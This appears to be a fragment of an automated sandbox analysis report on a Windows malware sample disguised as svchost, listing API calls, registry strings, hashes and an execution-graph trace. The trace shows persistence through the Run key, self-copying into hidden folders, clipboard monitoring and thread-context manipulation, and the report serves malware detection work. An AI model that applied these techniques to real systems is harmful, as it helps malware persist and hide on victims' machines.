                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2931CF7661CAC485D770DB55E8987AEB3A0F788740F804136DA8D87758DF3DD554CB10
                                                                                                                                                                                                                                  Function 00007FF7DF223A3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DF22374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: GetVolumeInformationW.KERNELBASE ref: 00007FF7DF2237C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: wsprintfW.USER32 ref: 00007FF7DF22386A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22395D
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF7DF223A81
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF7DF223A8C
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF7DF223AA5
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF7DF223ABD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                  • Opcode ID: 1d557928b21f0a1a08616f9ba284bd2bda40ddf4db2123bf444826e075a90e38
                                                                                                                                                                                                                                  • Instruction ID: 969bdc885b85fd0f1a5f9d82436b2de0fd3756118cf713714be54e5e7713ca9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d557928b21f0a1a08616f9ba284bd2bda40ddf4db2123bf444826e075a90e38
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2016D61A185C693EB60AB24EC503EEA360FB94744FC04033D24E8A5E8EE2CE649CB50
                                                                                                                                                                                                                                  Function 00007FF7DF223B4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                                                  • Opcode ID: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction ID: 82ea884048ca46ddf5acd14beada6064db7dc8292b3caf2b280209922090994a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC012536618A808ADB609B14F84479EB7A0F788794FC01222EB8D43B68DF7CD149CF10
                                                                                                                                                                                                                                  Function 00007FF7DF2213C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                                  • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction ID: 171ee82ea3f0e81d331b098b821446e7049197229e360dfa0f039077ee222508
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1101FF3190C682D6E730AF10F8467ADA7A0FB84348FD04136D68D46694DF7CE649CF14
                                                                                                                                                                                                                                  Function 00007FF7DF22397C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                  • Opcode ID: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction ID: ed5198ed0cb5218ae5a65af84b2d80d5eba27d4e9dbdd285550366364111b3b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4211363652878086D7509B14F8446AEB7A0F7847A0F905232F95E47BE8DF7CD585CB10
                                                                                                                                                                                                                                  Function 00007FF7DF221088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                                  • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction ID: 152d319fbff324d031dec5760664f50666018b70ee7678a0b0cd331213356ea2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE01221918AC3D2D620BB10FC463ADA3A0FF84758FD04132D98D46664DF3CE64DCB14
                                                                                                                                                                                                                                  Function 00007FF7DF222F34 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22452C: CreateFileW.KERNELBASE ref: 00007FF7DF224573
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF2210D8: OpenProcess.KERNEL32 ref: 00007FF7DF2210FC
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7DF222FCF
                                                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7DF222FE2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                                  • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                                  • Opcode ID: ffebf344874d82d2a241bb26d672387442fd6a5fc6dc914198ec4c1f4e766031
                                                                                                                                                                                                                                  • Instruction ID: ae08cce4de156eec38aa9242facbf93fc48f54eade9a7c72ba2e7d058c1682c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffebf344874d82d2a241bb26d672387442fd6a5fc6dc914198ec4c1f4e766031
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F11C521A19AC282E610FB50EC443EEB3A0FB88744FC08137D68C46669DF7CF545CB60

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:6.7%
                                                                                                                                                                                                                                  Total number of Nodes:598
                                                                                                                                                                                                                                  Total number of Limit Nodes:57
                                                                                                                                                                                                                                  execution_graph 104467 1020d790 104468 1020d7ac 104467->104468 104471 1020d7b1 104467->104471 104481 10213d74 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 __security_init_cookie 104468->104481 104470 1020d806 104471->104470 104472 1020d83c 104471->104472 104482 1020d638 79 API calls 15 library calls 104471->104482 104472->104470 104483 1020b480 104472->104483 104474 1020d85a 104476 1020b480 _DllMainCRTStartup 289 API calls 104474->104476 104480 1020d883 104474->104480 104478 1020d876 104476->104478 104492 1020d638 79 API calls 15 library calls 104478->104492 104480->104470 104493 1020d638 79 API calls 15 library calls 104480->104493 104481->104471 104482->104472 104484 1020b4a0 _DllMainCRTStartup 104483->104484 104485 1020b488 104483->104485 104529 101f8bd0 22 API calls _DllMainCRTStartup 104484->104529 104486 1020b4ac 104485->104486 104528 101f5340 17 API calls _DllMainCRTStartup 104485->104528 104486->104474 104489 1020b491 104494 1020b2c0 104489->104494 104492->104480 104493->104470 104530 10204f30 104494->104530 104497 1020b36d lstrcmpiA 104500 1020b381 _DllMainCRTStartup 104497->104500 104501 1020b38b lstrcmpiA 104497->104501 104498 1020b32d 104532 1020b270 CreateMutexA 104498->104532 104539 1020a010 81 API calls _DllMainCRTStartup 104500->104539 104502 1020b3ab lstrcmpiA 104501->104502 104506 1020b39f _DllMainCRTStartup 104501->104506 104504 1020b3ce lstrcmpiA 104502->104504 104508 1020b3bf _DllMainCRTStartup 104502->104508 104503 1020b339 104503->104497 104507 1020b33d _DllMainCRTStartup 104503->104507 104509 1020b3f1 lstrcmpiA 104504->104509 104510 1020b3e2 _DllMainCRTStartup 104504->104510 104540 10209730 171 API calls 2 library calls 104506->104540 104514 1020b342 CreateThread 104507->104514 104541 10209730 171 API calls 2 library calls 104508->104541 104511 1020b414 lstrcmpiA 104509->104511 104512 1020b405 _DllMainCRTStartup 104509->104512 104542 10209730 171 API calls 2 library calls 104510->104542 104515 1020b428 _DllMainCRTStartup 104511->104515 104516 1020b439 CreateThread 104511->104516 104543 10209730 171 API calls 2 library calls 104512->104543 104537 101f1c60 22 API calls 2 library calls 104514->104537 104544 10209730 171 API calls 2 library calls 104515->104544 104521 1020b45a 104516->104521 104546 102073b0 104516->104546 104520 1020b368 104538 10205580 88 API calls _DllMainCRTStartup 104520->104538 104545 1020cbb0 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind __crtCapturePreviousContext 104521->104545 104525 1020b46c 104525->104474 104527 1020b437 104527->104521 104528->104489 104529->104486 104531 10204f3c GetModuleFileNameA PathFindFileNameA lstrcmpiA 104530->104531 104531->104497 104531->104498 104533 1020b29e GetLastError 104532->104533 104534 1020b28e CloseHandle 104532->104534 104535 1020b296 104533->104535 104536 1020b2ab CloseHandle 104533->104536 104534->104535 104535->104503 104536->104503 104537->104520 104540->104502 104541->104504 104542->104509 104543->104511 104544->104527 104545->104525 104549 102073da _DllMainCRTStartup 104546->104549 104548 101f2c10 78 API calls _DllMainCRTStartup 104548->104549 104549->104548 104550 10207418 _DllMainCRTStartup 104549->104550 104554 10207a90 38 API calls 104549->104554 104555 1020790b Sleep 104549->104555 104557 10207960 OpenClipboard 104549->104557 104550->104549 104551 10207b50 7 API calls 104550->104551 104552 101f1100 38 API calls _DllMainCRTStartup 104550->104552 104553 101f2c10 78 API calls _DllMainCRTStartup 104550->104553 104550->104555 104556 10207b00 38 API calls 104550->104556 104551->104550 104552->104550 104553->104550 104554->104549 104555->104549 104556->104550 104558 102079d4 104557->104558 104559 1020797b GetClipboardData 104557->104559 104569 101f2c10 104558->104569 104561 10207991 GlobalLock 104559->104561 104562 102079ab CloseClipboard 104559->104562 104561->104562 104565 1020799f GlobalUnlock 104561->104565 104562->104558 104563 102079bb 104562->104563 104568 101f1100 38 API calls _DllMainCRTStartup 104563->104568 104564 102079e3 104564->104549 104565->104562 104567 102079c6 104567->104549 104568->104567 104570 101f2c2d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 104569->104570 104573 101f2070 104570->104573 104572 101f2c64 104572->104564 104574 101f2099 _DllMainCRTStartup 104573->104574 104575 101f2136 104574->104575 104576 101f20a2 _DllMainCRTStartup 104574->104576 104590 101f2030 38 API calls _DllMainCRTStartup 104575->104590 104579 101f20dc 104576->104579 104580 101f20c4 104576->104580 104589 101f1e80 38 API calls _DllMainCRTStartup 104579->104589 104587 101f23e0 78 API calls _DllMainCRTStartup 104580->104587 104583 101f20cd 104588 101f2360 78 API calls _DllMainCRTStartup 104583->104588 104585 101f20da 104586 101f20e7 char_traits _DllMainCRTStartup 104585->104586 104586->104572 104587->104583 104588->104585 104589->104586 104591 df217f0 104636 df22650 104591->104636 104593 df21865 104594 df22650 37 API calls 104593->104594 104595 df21870 104594->104595 104645 df3c2ac 104595->104645 104598 df21891 lstrcpyA 104599 df2189d _ld12tod 104598->104599 104600 df218ba SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 104599->104600 104601 df219a2 lstrcatA 104600->104601 104602 df2192a lstrcmpiA 104600->104602 104604 df219c0 lstrcmpiA 104601->104604 104602->104601 104603 df2193e lstrcmpiA 104602->104603 104603->104601 104605 df21952 lstrcmpiA 104603->104605 104606 df219d4 104604->104606 104607 df219de 104604->104607 104605->104601 104608 df21966 lstrcmpiA 104605->104608 104609 df219e3 PathFindFileNameW CreateThread 104606->104609 104607->104609 104610 df21a09 104607->104610 104608->104601 104611 df2197a lstrcmpiA 104608->104611 104609->104610 104662 df22710 104610->104662 104611->104601 104613 df2198e lstrcmpiA 104611->104613 104613->104601 104613->104604 104614 df21c0c 104673 df3c26c 104614->104673 104615 df21a21 104615->104614 104618 df21a94 104615->104618 104617 df21c14 104619 df3c26c free 8 API calls 104617->104619 104623 df21ab5 _ld12tod _DllMainCRTStartup 104618->104623 104671 df217a0 GetNativeSystemInfo IsWow64Process 104618->104671 104621 df21c1c 104619->104621 104624 df3c26c free 8 API calls 104621->104624 104622 df21aa3 104625 df21ac2 TerminateProcess 104622->104625 104626 df21aa7 104622->104626 104627 df21b03 CreateFileA WriteFile WriteFile 104623->104627 104628 df21c24 104624->104628 104625->104623 104672 df21370 46 API calls 5 library calls 104626->104672 104630 df21c03 CloseHandle 104627->104630 104631 df21b7b 6 API calls 104627->104631 104632 df3c26c free 8 API calls 104628->104632 104630->104614 104631->104630 104633 df21c2d 104632->104633 104679 df3cbb0 104633->104679 104635 df21c3f 104637 df22666 WideCharToMultiByte 104636->104637 104638 df2265e 104636->104638 104639 df226b1 104637->104639 104640 df2269f 104637->104640 104638->104593 104641 df3c2ac malloc 35 API calls 104639->104641 104640->104593 104642 df226c0 104641->104642 104643 df226f2 104642->104643 104644 df226c8 WideCharToMultiByte 104642->104644 104643->104593 104644->104643 104646 df3c340 104645->104646 104652 df3c2c4 104645->104652 104692 df3de38 DecodePointer 104646->104692 104648 df3c2fc HeapAlloc 104648->104652 104653 df2187d PathFindFileNameA 104648->104653 104649 df3c345 104693 df3fba8 8 API calls _getptd_noexit 104649->104693 104652->104648 104654 df3c325 104652->104654 104658 df3c32a 104652->104658 104661 df3c2dc 104652->104661 104689 df3de38 DecodePointer 104652->104689 104653->104598 104653->104599 104690 df3fba8 8 API calls _getptd_noexit 104654->104690 104691 df3fba8 8 API calls _getptd_noexit 104658->104691 104661->104648 104686 df3d8f0 31 API calls 2 library calls 104661->104686 104687 df3d964 31 API calls 5 library calls 104661->104687 104688 df3deb8 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 104661->104688 104663 df22724 MultiByteToWideChar 104662->104663 104664 df227ad 104662->104664 104665 df22759 104663->104665 104666 df2274c 104663->104666 104664->104615 104667 df3c2ac malloc 35 API calls 104665->104667 104666->104615 104668 df2276b 104667->104668 104669 df22783 MultiByteToWideChar 104668->104669 104670 df22773 104668->104670 104669->104664 104670->104615 104671->104622 104672->104623 104674 df3c271 HeapFree 104673->104674 104678 df3c2a1 realloc 104673->104678 104675 df3c28c 104674->104675 104674->104678 104694 df3fba8 8 API calls _getptd_noexit 104675->104694 104677 df3c291 GetLastError 104677->104678 104678->104617 104681 df3cbb9 104679->104681 104680 df3cd54 IsProcessorFeaturePresent 104683 df3cd6b 104680->104683 104681->104680 104682 df3cbc4 104681->104682 104682->104635 104695 df423dc RtlLookupFunctionEntry __crtCapturePreviousContext 104683->104695 104685 df3cd7e 104685->104635 104686->104661 104687->104661 104689->104652 104690->104658 104691->104653 104692->104649 104693->104653 104694->104677 104695->104685 104696 df28d90 104697 df28dff 104696->104697 104698 df28d9f _DllMainCRTStartup 104696->104698 104699 df28de8 HeapFree 104698->104699 104700 df28dca ResumeThread CloseHandle 104698->104700 104701 df28de3 104698->104701 104699->104697 104700->104698 104701->104699 104702 df28850 104709 df28660 104702->104709 104704 df288d3 104705 df2887c _DllMainCRTStartup 104705->104704 104706 df288ac SuspendThread 104705->104706 104721 df28c50 GetThreadContext 104706->104721 104720 df28686 104709->104720 104710 df28766 104711 df3cbb0 LangCountryEnumProcEx 2 API calls 104710->104711 104712 df28773 104711->104712 104712->104705 104713 df2875d CloseHandle 104713->104710 104714 df28740 Thread32Next 104714->104713 104714->104720 104715 df286bb GetCurrentProcessId 104715->104714 104716 df286c7 GetCurrentThreadId 104715->104716 104716->104714 104716->104720 104717 df286db HeapAlloc 104717->104713 104718 df286ff 104717->104718 104718->104720 104719 df28709 HeapReAlloc 104719->104713 104719->104720 104720->104710 104720->104713 104720->104714 104720->104715 104720->104717 104720->104719 104722 df28d5b 104721->104722 104725 df28c92 _DllMainCRTStartup 104721->104725 104723 df3cbb0 LangCountryEnumProcEx 2 API calls 104722->104723 104724 df288c3 CloseHandle 104723->104724 104724->104705 104725->104722 104726 df28d34 SetThreadContext 104725->104726 104726->104725 104727 df28500 104728 df28531 104727->104728 104729 df28539 VirtualProtect 104727->104729 104728->104729 104730 df28554 104729->104730 104731 df2855e VirtualProtect 104729->104731 104735 df4f158 104731->104735 104736 df4f15f 104735->104736 104737 df28900 104754 df28610 104737->104754 104739 df2892a _DllMainCRTStartup 104740 df28a52 _DllMainCRTStartup 104739->104740 104759 df276e0 104739->104759 104741 df3cbb0 LangCountryEnumProcEx 2 API calls 104740->104741 104742 df28a82 104741->104742 104746 df28992 104747 df28a45 104746->104747 104748 df2899a 104746->104748 104765 df27840 VirtualFree VirtualFree 104747->104765 104763 df28280 HeapAlloc HeapReAlloc 104748->104763 104751 df2899f 104753 df289ab 104751->104753 104764 df27840 VirtualFree VirtualFree 104751->104764 104753->104740 104755 df28651 104754->104755 104756 df2862d Sleep 104754->104756 104755->104739 104756->104755 104766 df278c0 GetSystemInfo 104759->104766 104761 df276e9 104761->104740 104762 df28e10 IsProcessorFeaturePresent RtlLookupFunctionEntry _DllMainCRTStartup LangCountryEnumProcEx 104761->104762 104762->104746 104763->104751 104764->104753 104765->104740 104767 df278f5 _DllMainCRTStartup 104766->104767 104767->104761 104768 df3d790 104769 df3d7ac 104768->104769 104771 df3d7b1 104768->104771 104782 df43d74 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 __security_init_cookie 104769->104782 104772 df3d83c 104771->104772 104779 df3d806 104771->104779 104783 df3d638 78 API calls 15 library calls 104771->104783 104772->104779 104784 df3b480 104772->104784 104774 df3d85a 104776 df3d883 104774->104776 104778 df3b480 _DllMainCRTStartup 288 API calls 104774->104778 104776->104779 104794 df3d638 78 API calls 15 library calls 104776->104794 104780 df3d876 104778->104780 104793 df3d638 78 API calls 15 library calls 104780->104793 104782->104771 104783->104772 104785 df3b4a0 